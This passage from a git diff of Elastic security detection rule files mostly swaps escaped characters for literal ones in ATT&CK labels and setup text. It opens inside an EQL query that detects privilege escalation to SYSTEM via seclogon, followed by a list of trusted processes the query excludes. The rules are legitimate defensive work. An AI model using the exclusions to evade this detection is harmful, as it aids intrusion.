\"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true) and \n\n /* AM_Delta_Patch Windows Update */\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\Packages\\\\Preview\\\\*\\\\wuaucltcore.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuauclt.exe\", 
\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuaucltcore.exe\", \n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\*\\\\wuaucltcore.exe\")) and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and process.parent.executable == null) and\n\n /* Other third party SW */\n not process.parent.executable :\n (\"?:\\\\Program Files (x86)\\\\HEAT Software\\\\HEAT Remote\\\\HEATRemoteServer.exe\",\n \"?:\\\\Program Files (x86)\\\\VisualCron\\\\VisualCronService.exe\",\n \"?:\\\\Program Files\\\\BinaryDefense\\\\Vision\\\\Agent\\\\bds-vision-agent-app.exe\",\n \"?:\\\\Program Files\\\\Tablet\\\\Wacom\\\\WacomHost.exe\",\n \"?:\\\\Program Files (x86)\\\\LogMeIn\\\\x64\\\\LogMeIn.exe\",\n \"?:\\\\Program Files (x86)\\\\EMC Captiva\\\\Captiva Cloud Runtime\\\\Emc.Captiva.WebCaptureRunner.exe\",\n \"?:\\\\Program Files\\\\Freedom Scientific\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome Remote Desktop\\\\*\\\\remoting_host.exe\",\n \"?:\\\\Program Files (x86)\\\\GoToAssist Remote Support Customer\\\\*\\\\g2ax_comm_customer.exe\")\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid > 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n /* Logon Utilities */\n not (process.parent.executable : 
\"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and\n process.executable : (\"?:\\\\Windows\\\\System32\\\\osk.exe\",\n \"?:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"?:\\\\Windows\\\\System32\\\\Magnify.exe\")) and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true) and \n\n /* AM_Delta_Patch Windows Update */\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\Packages\\\\Preview\\\\*\\\\wuaucltcore.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuaucltcore.exe\", \n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\*\\\\wuaucltcore.exe\")) and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and process.parent.executable == null) and\n\n /* Other third party SW */\n not process.parent.executable :\n (\"?:\\\\Program Files (x86)\\\\HEAT Software\\\\HEAT Remote\\\\HEATRemoteServer.exe\",\n \"?:\\\\Program Files (x86)\\\\VisualCron\\\\VisualCronService.exe\",\n \"?:\\\\Program Files\\\\BinaryDefense\\\\Vision\\\\Agent\\\\bds-vision-agent-app.exe\",\n \"?:\\\\Program Files\\\\Tablet\\\\Wacom\\\\WacomHost.exe\",\n \"?:\\\\Program Files (x86)\\\\LogMeIn\\\\x64\\\\LogMeIn.exe\",\n \"?:\\\\Program Files (x86)\\\\EMC Captiva\\\\Captiva Cloud Runtime\\\\Emc.Captiva.WebCaptureRunner.exe\",\n \"?:\\\\Program Files\\\\Freedom Scientific\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome Remote 
Desktop\\\\*\\\\remoting_host.exe\",\n \"?:\\\\Program Files (x86)\\\\GoToAssist Remote Support Customer\\\\*\\\\g2ax_comm_customer.exe\")\n", "references": [ "https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6", "https://blog.didierstevens.com/2017/03/20/", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_104.json b/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_104.json index a6ec4a3fd31..0a41e8599ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_104.json +++ b/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_104.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json b/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json index 6df640ed2b2..cb898fd3c41 100644 --- a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json +++ b/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_101.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_101.json index 61128bd4314..27935babedd 100644 
--- a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_101.json +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_101.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_102.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_102.json index acf3473a3f8..28fcbb73c58 100644 --- a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_1.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_1.json index 74d2c65527d..7bfa2ebeaa0 100644 --- a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_1.json +++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_1.json 
@@ -41,7 +41,7 @@ ], "risk_score": 21, "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -68,7 +68,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_2.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_2.json index 81db9eb890f..1087861417f 100644 --- a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_2.json +++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_2.json 
@@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_3.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_3.json index 4e77e9ef32b..c60b7972349 100644 --- a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_3.json +++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_3.json 
@@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_4.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_4.json index 58796c1367e..f871147fc3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_4.json +++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_4.json 
@@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_1.json b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_1.json index 9aca78271aa..2131dc92eb4 100644 --- a/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_1.json 
@@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_101.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_101.json index 826dc0878bc..428b46d2532 100644 --- a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_101.json +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_101.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_102.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_102.json index 0210052594c..0a91d136e8a 100644 --- a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_102.json +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_103.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_103.json index a02c4f8f531..efbba1d7b86 100644 --- a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_103.json 
@@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_104.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_104.json index b3ee668ddfb..46976f5e055 100644 --- a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_104.json @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_105.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_105.json index 1b8ca3ba8c8..24ef1d2ca4b 100644 --- a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_105.json @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_106.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_106.json index 983c55ab034..c9ce06e3e7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_106.json 
@@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_107.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_107.json index bfd2ba87920..59762f79e53 100644 --- a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_107.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -112,7 +112,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_103.json b/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_103.json index 3e20321cf6b..fb3ed1703d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_103.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_104.json b/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_104.json index 2cb608156d8..a76f8801e6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_101.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_101.json index eb50cad9ca3..5b7dfbd8117 100644 --- a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_101.json +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_101.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_102.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_102.json index a612633abb3..df3ca05bf92 100644 --- a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_102.json +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_102.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_104.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_104.json index d7d212a6b91..caeceacb25a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_104.json 
@@ -97,7 +97,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_105.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_105.json index 3f2649af97a..e150ac9ab63 100644 --- a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_105.json @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_106.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_106.json index b97a4faeaa7..4f5d4d266f3 100644 --- a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_106.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_107.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_107.json index 1c95e8c16c7..ddac5eb360f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_107.json 
@@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_104.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_104.json index 6469ade281b..35629b66cb6 100644 --- a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_104.json @@ -59,7 +59,7 @@ ], "risk_score": 21, "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_105.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_105.json index 8c4ae873221..fc6547ff1ed 100644 
--- a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_105.json @@ -59,7 +59,7 @@ ], "risk_score": 21, "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_106.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_106.json index 528f358a0d5..2aca4653b7f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_106.json 